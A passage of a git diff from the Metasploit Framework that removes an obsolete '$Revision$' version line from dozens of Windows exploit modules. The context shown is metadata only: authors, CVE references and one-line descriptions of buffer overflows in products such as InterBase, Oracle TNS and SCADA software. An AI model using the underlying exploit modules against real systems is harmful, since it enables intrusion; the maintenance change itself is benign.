'Fairuzan Roslan ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3844' ], diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index 70301daf6b..349b7dd496 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1865' ], diff --git a/modules/exploits/windows/misc/hp_omniinet_4.rb b/modules/exploits/windows/misc/hp_omniinet_4.rb index d45c2b4120..332ab4dc1a 100644 --- a/modules/exploits/windows/misc/hp_omniinet_4.rb +++ b/modules/exploits/windows/misc/hp_omniinet_4.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote enabled by default. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Oren Isacson', #Initial discovery, poc diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index 1d64756e7c..043e3b8ffd 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3872' ], diff --git a/modules/exploits/windows/misc/ib_isc_attach_database.rb b/modules/exploits/windows/misc/ib_isc_attach_database.rb index ecc4e697f8..b4adce5c83 100644 --- a/modules/exploits/windows/misc/ib_isc_attach_database.rb +++ b/modules/exploits/windows/misc/ib_isc_attach_database.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/ib_isc_create_database.rb b/modules/exploits/windows/misc/ib_isc_create_database.rb index 4542ffdf6a..9933574609 100644 --- a/modules/exploits/windows/misc/ib_isc_create_database.rb +++ b/modules/exploits/windows/misc/ib_isc_create_database.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb index 09cb484fbe..fc57873c33 100644 --- a/modules/exploits/windows/misc/ib_svc_attach.rb +++ b/modules/exploits/windows/misc/ib_svc_attach.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb index 67c2caed14..0a5e5e2626 100644 --- a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb +++ b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3853' ], diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index 385a94d3de..2f7be2250f 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4828' ], diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb index 467a6b9931..6d8dc17154 100644 --- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb +++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote code can be executed. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-1674'], diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index 2ec86746dd..f3ec16d281 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb +++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-4411' ], diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb index d01f0a23b5..1181d12b26 100644 --- a/modules/exploits/windows/misc/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'CORELAN Security Team ', 'Ron Henry ', # dijital1; Return address update ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-5109'], diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index bc98fe2d09..99981e0239 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4449' ], diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb index 7ef0252fa7..b50d648c70 100644 --- a/modules/exploits/windows/misc/ms07_064_sami.rb +++ b/modules/exploits/windows/misc/ms07_064_sami.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3901' ], diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb index c88878b756..969de21f96 100644 --- a/modules/exploits/windows/misc/netcat110_nt.rb +++ b/modules/exploits/windows/misc/netcat110_nt.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'patrick', 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1317' ], diff --git a/modules/exploits/windows/misc/nettransport.rb b/modules/exploits/windows/misc/nettransport.rb index a3a4f8635b..a94600ec60 100644 --- a/modules/exploits/windows/misc/nettransport.rb +++ b/modules/exploits/windows/misc/nettransport.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '61435' ], diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index b5d82230d5..8525017434 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1029' ], diff --git a/modules/exploits/windows/misc/poppeeper_uidl.rb b/modules/exploits/windows/misc/poppeeper_uidl.rb index d08ecae39e..8e30a41c3e 100644 --- a/modules/exploits/windows/misc/poppeeper_uidl.rb +++ b/modules/exploits/windows/misc/poppeeper_uidl.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '53559' ], diff --git a/modules/exploits/windows/misc/pxexploit.rb b/modules/exploits/windows/misc/pxexploit.rb index 1797f39d12..63b845050b 100644 --- a/modules/exploits/windows/misc/pxexploit.rb +++ b/modules/exploits/windows/misc/pxexploit.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( 'Name' => 'PXE Exploit Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that @@ -30,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'scriptjunkie' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DefaultOptions' => { 'EXITFUNC' => 'thread', diff --git a/modules/exploits/windows/misc/realtek_playlist.rb b/modules/exploits/windows/misc/realtek_playlist.rb index e00a85817c..a22730eb31 100644 --- a/modules/exploits/windows/misc/realtek_playlist.rb +++ b/modules/exploits/windows/misc/realtek_playlist.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5664'], diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb index 6d02ab4e2f..af0b4e2bb8 100644 --- a/modules/exploits/windows/misc/sap_2005_license.rb +++ b/modules/exploits/windows/misc/sap_2005_license.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote code execution. }, 'Author' => 'Jacopo Cervini', - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '56837' ], diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index 25f99d2d8d..cebc5f75a3 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2004-1595'], diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb index 58eb9ce20f..264cdf1f71 100644 --- a/modules/exploits/windows/misc/splayer_content_type.rb +++ b/modules/exploits/windows/misc/splayer_content_type.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote as the 'Content-Type' parameter. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'xsploitedsec ', #Initial discovery, PoC diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index 325c86dfe3..9b1ac830c7 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64582'], diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index 4e71100367..ef89972404 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote address and execute arbitrary code. Credit to Maarten Boone. }, 'Author' => 'Jacopo Cervini ', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2711'], diff --git a/modules/exploits/windows/misc/ufo_ai.rb b/modules/exploits/windows/misc/ufo_ai.rb index 130a2616c9..252c0b373a 100644 --- a/modules/exploits/windows/misc/ufo_ai.rb +++ b/modules/exploits/windows/misc/ufo_ai.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie' # MSF Module Author ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '65689'], diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index 0ebd92c7ac..66919f0478 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-4006'], diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index c86e1665ec..20ddc25c95 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'sickness', #proof of concept 'corelanc0d3r ', #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1591'], diff --git a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb index da1b1e8def..4b97aa83c5 100644 --- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb +++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'jduck', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0478' ], diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index fe9ee50921..8ac0cf73f4 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1117' ], diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb index 80fac095fc..7942402880 100644 --- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb +++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-4145'], diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb index 19e2f5c7b1..ea52d660b0 100644 --- a/modules/exploits/windows/mssql/ms02_039_slammer.rb +++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-0649'], diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb index 4c2f0253cc..a82bf46bb1 100644 --- a/modules/exploits/windows/mssql/ms02_056_hello.rb +++ b/modules/exploits/windows/mssql/ms02_056_hello.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1123'], diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index baa3f28207..4e140ecf6f 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -54,7 +54,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '50589' ], diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 223b1c73b8..9b8533acd6 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -54,7 +54,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Rodrigo Marcos' # SQL Injection mods ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '50589' ], diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index e34019b4c7..5d01bde070 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # command stager mods ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # 'sa' password in logs diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index aab3dc9205..091ac967c8 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb @@ -60,7 +60,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Rodrigo Marcos' # SQL injection mods ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # 'sa' password in logs diff --git a/modules/exploits/windows/mysql/mysql_payload.rb b/modules/exploits/windows/mysql/mysql_payload.rb index f18133f638..e21769fed9 100644 --- a/modules/exploits/windows/mysql/mysql_payload.rb +++ b/modules/exploits/windows/mysql/mysql_payload.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote 'todb' # this Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # Bernardo's work with cmd exec via udf diff --git a/modules/exploits/windows/mysql/mysql_yassl_hello.rb b/modules/exploits/windows/mysql/mysql_yassl_hello.rb index ce626ef0f8..61503ae694 100644 --- a/modules/exploits/windows/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/windows/mysql/mysql_yassl_hello.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0226' ], diff --git a/modules/exploits/windows/nfs/xlink_nfsd.rb b/modules/exploits/windows/nfs/xlink_nfsd.rb index b381daa5c4..e82a00372a 100644 --- a/modules/exploits/windows/nfs/xlink_nfsd.rb +++ b/modules/exploits/windows/nfs/xlink_nfsd.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5780' ], diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index 929970a0ee..9029e420eb 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1213' ], diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index 0dea84bbaa..ecfaf7df9a 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2703' ], diff --git a/modules/exploits/windows/novell/nmap_stor.rb b/modules/exploits/windows/novell/nmap_stor.rb index 03d4fe401c..517a656f2d 100644 --- a/modules/exploits/windows/novell/nmap_stor.rb +++ b/modules/exploits/windows/novell/nmap_stor.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6424' ], diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index 8550cf6dd5..d0ab3f9384 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Unknown' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-1543'], diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb index 7760d28e2a..09350c3b7a 100644 --- a/modules/exploits/windows/oracle/osb_ndmp_auth.rb +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5444' ], diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 465fd91570..e569457ef6 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0499' ], diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index b3688d22df..eb3009f95c 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1979'], diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index a660bd0019..a8ec9538a0 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-0965'], diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index 28d8c046ff..53f39f6a5b 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -46,7 +46,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'stinko', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0264'], diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index cc2e5df06d..6d5e70e3ed 100644 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-4085'], diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index bc7f857203..99ac9dc924 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2416' ], diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index 43883e288b..e27e69526b 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2004-0326'], diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index 82bce6bb03..70f75e3eb2 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'patrick', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2926' ], diff --git a/modules/exploits/windows/scada/citect_scada_odbc.rb b/modules/exploits/windows/scada/citect_scada_odbc.rb index 9050a367c7..296010e3b3 100644 --- a/modules/exploits/windows/scada/citect_scada_odbc.rb +++ b/modules/exploits/windows/scada/citect_scada_odbc.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'KF ', # Original Metasploit module 'patrick', # Some clean up - I'm sure there's more to be done :) ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2639' ], diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index ee49a59726..d6d21a74ef 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -28,8 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Luigi Auriemma', # Initial discovery, crash poc 'mr_me ', # msf exploit ], - - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3492'], diff --git a/modules/exploits/windows/scada/factorylink_csservice.rb b/modules/exploits/windows/scada/factorylink_csservice.rb index c059a5a08d..7bf741a934 100644 --- a/modules/exploits/windows/scada/factorylink_csservice.rb +++ b/modules/exploits/windows/scada/factorylink_csservice.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote therefore causing a stack-based buffer overflow, and results arbitrary code execution. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Luigi Auriemma ', #Initial discovery, poc diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb index 92d635d2f9..f7624e0b6a 100644 --- a/modules/exploits/windows/scada/factorylink_vrn_09.rb +++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'MC', # SEH, badchars, etc ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '72815'], diff --git a/modules/exploits/windows/scada/iconics_genbroker.rb b/modules/exploits/windows/scada/iconics_genbroker.rb index ea951b57e8..b97f100a76 100644 --- a/modules/exploits/windows/scada/iconics_genbroker.rb +++ b/modules/exploits/windows/scada/iconics_genbroker.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote process, and then open up a shell session. Also, DEP bypass is supported. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Luigi Auriemma', #Initial discovery, poc diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb index a42fffb49a..e2996a3de7 100644 --- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb +++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote of the user. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Scoot Bell ', diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb index 8837901b0b..a47d7d4f1a 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote exits, IGSSdataServer.exe should automatically recover. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Author' => [ 'Luigi Auriemma', #Initial discovery, poc diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb index 93506879a6..8bb201b543 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote the small buffer size, which cannot even contain our ROP chain and the final payload. }, 'License' => 